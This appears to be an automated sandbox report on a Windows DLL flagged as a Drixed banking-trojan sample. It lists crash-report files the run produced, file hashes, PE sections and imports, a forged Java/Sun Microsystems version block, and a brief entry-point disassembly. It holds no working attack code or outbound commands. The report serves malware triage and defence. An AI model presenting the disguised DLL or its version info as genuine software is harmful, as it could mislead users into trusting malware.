SSDEEP:	192:keiD0oXZHBUZMX4jed+9/u7sWS274ItWc:BidXJBUZMX4je4/u7sWX4ItWc
MD5:	CCEA7058269A40866547402C32B0E12A
SHA1:	638C28D714E87A2B1FB9CB76E65AD4D2B4590188
SHA-256:	F6F42848EC901990E01446A63B6D3C218D982C9EDE770F8F2EF969F89DFA9784
SHA-512:	C88C4C7127119932C467C805ADBB1734E22A5ED95DFB0DB38C938753A2C9298587ECE7632EE76EA87C2F0DAE6EA138546075730D2B58A382EDBFA9E1FD60EE0E
Malicious:	false
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.2.7.9.8.9.6.2.5.0.5.2.7.1.0.2.0.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.7.9.8.9.6.2.6.3.7.7.7.0.8.3.7.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.7.a.2.d.4.9.7.5.-.a.f.4.6.-.4.3.9.1.-.9.4.8.2.-.c.1.6.3.0.7.b.a.8.d.8.d.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.7.c.5.6.a.1.d.0.-.d.d.0.7.-.4.4.7.b.-.8.e.c.b.-.8.f.0.3.7.6.5.8.b.0.4.1.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.r.u.n.d.l.l.3.2...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.U.N.D.L.L.3.2...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.8.a.4.-.0.0.0.1.-.0.0.1.6.-.7.f.9.b.-.c.d.b.6.f.3.c.b.d.7.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.b.c.c.5.d.c.3.2.2.2.0.3.4.d.3.f.2.5.7.f.1.f.d.3.5.8.8.9.e.5.b.e.9.0.f.0.9.

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_rundll32.exe_c316961cf9547f4477c913cd7ccdecd11bd19_82810a17_09efd927\Report.wer Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.9165833115381509
Encrypted:	false
SSDEEP:	192:GMi00oX+HBUZMX4jed+9/u7sWS274ItWc:RiCX2BUZMX4je4/u7sWX4ItWc
MD5:	F9E87888FA317EC87A8C755DABBD2C66
SHA1:	2585D9C93809CA4DCAAC39D1043DDC702B304E7B
SHA-256:	4E8B0739F101D95B13071B6D33751157C8C63543C2DB4E3284FEEFBFADC7FC76
SHA-512:	E41FAC32750B76F7F9AEE6FCE30129B6187B40EA0D0315858A4DC5DE962F7AEF28B5A409728E54038664AEF30671B7A10006524267F61043E57A020E0E90A9AD
Malicious:	false
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.2.7.9.8.9.6.2.4.9.8.8.1.0.1.2.4.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.7.9.8.9.6.2.6.1.7.2.4.7.3.0.7.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.6.d.5.f.3.a.0.c.-.4.d.d.0.-.4.f.b.9.-.b.7.9.f.-.f.f.8.7.d.8.3.5.e.f.0.4.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.c.c.2.c.e.e.d.1.-.3.3.c.0.-.4.e.f.d.-.a.e.a.9.-.f.4.6.4.a.3.f.1.9.e.9.a.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.r.u.n.d.l.l.3.2...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.U.N.D.L.L.3.2...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.7.4.c.-.0.0.0.1.-.0.0.1.6.-.7.1.4.e.-.9.8.b.6.f.3.c.b.d.7.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.b.c.c.5.d.c.3.2.2.2.0.3.4.d.3.f.2.5.7.f.1.f.d.3.5.8.8.9.e.5.b.e.9.0.f.0.9.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERA390.tmp.dmp Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Thu Oct 28 12:04:12 2021, 0x1205a4 type
Category:	dropped
Size (bytes):	46524
Entropy (8bit):	2.079389502299483
Encrypted:	false
SSDEEP:	192:Hf9C04q8A0nO5SkbhnpLh6dBpu8ESz3yyPWt/nfV:9B8q5LbF58d7u8ESz3yya/f
MD5:	8CF91AF0FC9D82647FF152F00E0ABB6D
SHA1:	103DBA4D056EFF05F8345517C2BA7AC414F26D9E
SHA-256:	29ECC9C3001CD194DCF145DFFB73DBCA4B837C4B2149C17D71D53116565AA066
SHA-512:	8B76EC2219B01EBAD5BA871CBC0469A1D8AE6D52063DFE79E838DA35E617104F1F4C51523A96D947DBE828B081F76361352C5173A39572F7400C5FE8E9E5935D
Malicious:	false
Preview:	MDMP....... .........za.........................................-..........T.......8...........T...........................0................................................................................U...........B..............GenuineIntelW...........T.......L...c.za.............................0..=...............P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.....................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WERA620.tmp.dmp Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Thu Oct 28 12:04:16 2021, 0x1205a4 type
Category:	dropped
Size (bytes):	44140
Entropy (8bit):	2.1497069393561423
Encrypted:	false
SSDEEP:	192:7CJC04Dvo4bMO5Skb9reDNQkGJfKAsek1I6+REP1V9yyaul1fnTcTu:szC5Lb9gzKnT6+RE/9yillwT
MD5:	468455B7C32BF823B1C70B241AE47E54
SHA1:	223BDB9E503CFD93134F2C6E483E2C4DF8988DF1
SHA-256:	34F7C9D2E1A24E6AAB9B70238812FF524DDFEBF19831518AC382D043E8840695
SHA-512:	9C8017A749F8DC524D0C90FF78057872A72E78398F3F4216C5CB9D7541633AACB53CF3A550E7F1B9B7142C8F4338F9FF48B48DB9BA4A090C2AEA6E6AA0049AC8
Malicious:	false
Preview:	MDMP....... .........za.........................................-..........T.......8...........T...............\|...........0................................................................................U...........B..............GenuineIntelW...........T...........c.za.............................0..=...............P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.....................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WERB2D3.tmp.WERInternalMetadata.xml Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	8352
Entropy (8bit):	3.7002846079489355
Encrypted:	false
SSDEEP:	192:Rrl7r3GLNip1P6JV6YYO+6MgmfT5S8Cprt89bq1sfjAOm:RrlsNipN6L6YK6MgmfT5SuqOfM
MD5:	4151D17A289312C107FEF6FE5FA3E5FF
SHA1:	2B297AAFA3784FC32650B8CFE6DF8BD196458B99
SHA-256:	71ADDB34D643ADE60DDD00AC3AC9E33196DD3B07BDA0F076A9ED80DE939E5735
SHA-512:	A4945E2416E774DF330782D6F4840D36067E8B00B345F76ECD4A42A6466F48C3391B72CB8CF4D9A6CC0541D379EC60AD6DE1BE10A83ED770BD95D7267A916007
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.9.6.4.<./.P.i.d.>.......

C:\ProgramData\Microsoft\Windows\WER\Temp\WERB72A.tmp.xml Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4700
Entropy (8bit):	4.500623001118657
Encrypted:	false
SSDEEP:	48:cvIwSD8zsKJgtWI9ouWSC8B8dtS8fm8M4JCdsPFW+q8/hL4SrSWd:uITfY7PSNq/HJqKDWWd
MD5:	06579D1301DAEF503B82F588180B029A
SHA1:	C263EDC496EF1D914E283FBDFC88A5B65F0922E3
SHA-256:	35DDB8B7C1A4B7876F5A16764FCAF68C294059CCEC731170EAC34F83CD188FD3
SHA-512:	DF727E13820797CF31458E7B9AEA574C93F3DDC1E6594807B566DF1E7DFEF50788E8923EBF92D52AFDDF16F452263BFB951AD964380F0FAC2F1D1B875D5F73EE
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1229594" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

C:\ProgramData\Microsoft\Windows\WER\Temp\WERC169.tmp.dmp Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Thu Oct 28 12:04:22 2021, 0x1205a4 type
Category:	dropped
Size (bytes):	45380
Entropy (8bit):	2.1265025958030526
Encrypted:	false
SSDEEP:	192:pFCC04pe0NCGO5Skb9K5TyquxTLogGlBra6C5iOVXZn7:Eaa5LbATyquFogGjra66i4J7
MD5:	BB604FE41CE924CB88F14A53F73D55EB
SHA1:	8C9E0289CF2584A1CF5AB36BB03075A58F241973
SHA-256:	A6CC4560B4BA9D45267FD3DF8F74416B64E369987F5A2714692B993350E5A305
SHA-512:	3CFE9393C19870116FA3BADB28E3CCFD2BF94B89568A02E54FE38835FFD7B3C8E29F3057AAB597279D967247C3E0B33BB2C2CE09557A046454214BE4DB89251D
Malicious:	false
Preview:	MDMP....... ........za.........................................-..........T.......8...........T...........................0................................................................................U...........B..............GenuineIntelW...........T...........c.za.............................0..=...............P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.....................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WERCB3D.tmp.WERInternalMetadata.xml Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	8352
Entropy (8bit):	3.6982586181853225
Encrypted:	false
SSDEEP:	192:Rrl7r3GLNiO66Fba6YYOS96MgmfTYS8CprLQ89bdfsfo/m:RrlsNiL6xa6YC6MgmfTYSPtdEfN
MD5:	24BAA055B5D6B7C373D05EC5658733A3
SHA1:	548FA50C505A0568902159D4532345A14DD29058
SHA-256:	703245EC3E5129BACCE3A5A8344AC60EFF8A9C6CBB8F1578523A447EA77D4317
SHA-512:	C74EB9A6A3FDE93B10B51A99B2596F4A99CA24E7C08A09D15BD2BC760E99BF2C0919C224A752A60087D4E471AE1215040CE40B47D0BDAF68E9A5E13AC0CABADD
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.2.2.1.2.<./.P.i.d.>.......

C:\ProgramData\Microsoft\Windows\WER\Temp\WERD020.tmp.xml Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4700
Entropy (8bit):	4.502820788645054
Encrypted:	false
SSDEEP:	48:cvIwSD8zsKJgtWI9ouWSC8Bz8fm8M4JCdsCF4+q8/hT4SrScH6d:uITfY7PSNyJ92DWi6d
MD5:	B54095CE6F524F7234526A5F8CC44462
SHA1:	649092155215605C275D23D39E1749BA88889D22
SHA-256:	B7BFD695CB733D64A69960D5193D097DBEC835C9E65B0BA53CB35050F2259A1B
SHA-512:	9E4756A0796D064D2067A619727C834748FC4B64DBF82DB1AC1D7CA4324EB3434B26EB3163ADD3C373D6C6C2BA1C598F6F076B5B73301D718CF3051EA70A36CD
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1229594" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

C:\ProgramData\Microsoft\Windows\WER\Temp\WERD744.tmp.WERInternalMetadata.xml Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	8352
Entropy (8bit):	3.701073180602495
Encrypted:	false
SSDEEP:	192:Rrl7r3GLNiQk6gG36YYOC68gmfT3SsCprRg89bG1qsftim:RrlsNir6h6YW68gmfT3StdG1Jf5
MD5:	645AA25DE0930D788B806E66F3BD8FDC
SHA1:	49906A9C0683FD3C7112C33BB658CF67496BAC68
SHA-256:	1B8281F03FDEAEB82D724B9838916FA84F40878B832A7348C4863CBCBF2D5EC4
SHA-512:	96523A5B3B017455F37335C83D4312795294269DF1D778E88A50175D347A19CED81A679FCFA7968299FDE23B29BA6102781387BC2C66CB32372708A4DF7D2BA2
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.1.2.0.<./.P.i.d.>.......

C:\ProgramData\Microsoft\Windows\WER\Temp\WERDCC3.tmp.xml Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4700
Entropy (8bit):	4.508329223101191
Encrypted:	false
SSDEEP:	48:cvIwSD8zsRJgtWI9wkckWSC8Bn8fm8M4JCds7FvT+q8/h8r4SrSEd:uITfjyc9SNqJnJrDWEd
MD5:	8985C591066C23F260D51139922D93A9
SHA1:	3BD08EC8716978765CA63D79685DF0EBD3FA1C35
SHA-256:	26DBEF706EF369902902A44D2E952AB5484953AE03146F4735DBF84793E16EF7
SHA-512:	39C2CBFAFDCA2597F0366E02B10769F675E18AC8F8FF7A5A09FF555D375B116A2C7945B0DAD3B6334C4AA63368069F6D47A25C9465A018E7A8CC2D1B876E21A4
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1229595" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

Static File Info

General
File type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.159938943426644
TrID:	Win32 Dynamic Link Library (generic) (1002004/3) 99.60% Generic Win/DOS Executable (2004/3) 0.20% DOS Executable Generic (2002/1) 0.20% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	SecuriteInfo.com.Drixed-FJXE53A16BEA791.13728.dll
File size:	1093632
MD5:	e53a16bea7918b1f7d4c0e659febc766
SHA1:	10d4d3d7fac35f6492cda2fb04aebf46903481f0
SHA256:	212cae7b05ecbc938b3a1fda4753d119f69360165955937b836fdbc7a6d514eb
SHA512:	014561ee3d96f09222cb1187c8b0a785e59e2d7dd1d3bec234088c2c382da693acc5cee4b21252462939574c1c666da8f09e45161b0856b0b413f7b687567eb5
SSDEEP:	24576:ljsXggYiykQsMy2GSuCAaimSQws2yyq+YoWEUK6ES0wOyeSGwswWquEQq2GiMciL:+
File Content Preview:	MZ......................@........................................IZ..(4..(4..(4..z..&)4.....Z)4..Q...)4..u5..(4.....K(4..v6."(4.7....(4. ...,(4.....i(4.....Z(4..(5.f)4.Rich.(4.........................PE..L...&.ya...........!.... `...P.......K.......p.....

File Icon


Icon Hash:	74f0e4ecccdce0e4

Static PE Info

General
Entrypoint:	0x10004b90
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x10000000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0x61798526 [Wed Oct 27 16:58:14 2021 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	0
File Version Major:	5
File Version Minor:	0
Subsystem Version Major:	5
Subsystem Version Minor:	0
Import Hash:	ae858e1bcf44b240b65263bbd6945db2

Entrypoint Preview

Instruction
mov eax, dword ptr [10106128h]
call eax
mov edx, eax
ret
int3
int3
int3
int3
int3
int3
push ebp
mov ebp, esp
push ebx
push edi
push esi
and esp, FFFFFFF8h
sub esp, 000000A8h
mov eax, dword ptr [ebp+08h]
mov dword ptr [esp+0000009Ch], 008A6C3Fh
mov byte ptr [esp+00000083h], 00000072h
mov dword ptr [esp+6Ch], 6C57D91Ch
mov dword ptr [esp+00000094h], 00000000h
mov dword ptr [esp+00000090h], 0093F6B2h
mov ecx, dword ptr [ebp+08h]
mov edx, esp
mov dword ptr [edx], ecx
mov dword ptr [esp+38h], eax
call 00007F5CF8BC9262h
movzx ecx, word ptr [esp+000000A2h]
mov si, cx
mov word ptr [esp+000000A2h], B4E5h
mov byte ptr [esp+37h], al
mov dword ptr [esp+30h], ecx
mov word ptr [esp+2Eh], si
call 00007F5CF8BC95DBh
mov ecx, dword ptr [esp+0000008Ch]
mov edx, ecx
add edx, DE3924BAh
mov dword ptr [esp+0000008Ch], edx
mov dword ptr [esp+70h], eax
mov eax, dword ptr [esp+30h]
add eax, eax
mov si, ax
mov word ptr [esp+000000A2h], si
mov eax, dword ptr [esp+70h]
mov edx, dword ptr [esp+00000090h]
mov edi, dword ptr [esp+00000094h]

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0xfad60	0x5f	.rdata
IMAGE_DIRECTORY_ENTRY_IMPORT	0xfae3c	0xb4	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x108000	0x3e8	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x109000	0x2a38	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x705c	0x38	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x7000	0x44	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x5dfe	0x6000	False	0.379720052083	data	4.39803113711	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata	0x7000	0xf4032	0xf5000	False	0.135154257015	data	7.11996019927	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xfc000	0xbd1c	0xb000	False	0.234153053977	data	5.69509557044	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc	0x108000	0x3e8	0x1000	False	0.119873046875	data	1.03136554304	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x109000	0x2a38	0x3000	False	0.231608072917	data	5.67874721692	IMAGE_SCN_TYPE_GROUP, IMAGE_SCN_TYPE_COPY, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_VERSION	0x108060	0x388	data

Imports

DLL	Import
SHELL32.dll	SHGetDesktopFolder
IPHLPAPI.DLL	GetIfTable
ADVAPI32.dll	RegOverridePredefKey
msvcrt.dll	memset
OLEAUT32.dll	VarR4FromI2
KERNEL32.dll	CreateFileW, GetModuleFileNameW
SETUPAPI.dll	SetupDiEnumDeviceInfo
USER32.dll	ShowOwnedPopups

Exports

Name	Ordinal	Address
FFRgpmdlwwWde	1	0x100fadb0

Version Infos

Description	Data
LegalCopyright	Copyright 2004
InternalName	ddlb
FileVersion	5.2.00.0
Full Version	5.2.0_00-b00
CompanyName	Sun Microsystems, Inc.
ProductName	Ddlb(EA) 2 Tsyfezyt Bidibhex Ernseqa 5.0 Urdate 6
ProductVersion	5.2.00.0
FileDescription	Java(TM) 2 Platform Standard Edition binary
OriginalFilename	ddlb.dll
Translation	0x0000 0x04b0

Network Behavior

No network behavior found

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: loaddll32.exe PID: 1624 Parent PID: 5932

General

Start time:	05:01:18
Start date:	28/10/2021
Path:	C:\Windows\System32\loaddll32.exe
Wow64 process (32bit):	true
Commandline:	loaddll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Drixed-FJXE53A16BEA791.13728.dll'
Imagebase:	0x120000
File size:	893440 bytes
MD5 hash:	72FCD8FB0ADC38ED9050569AD673650E
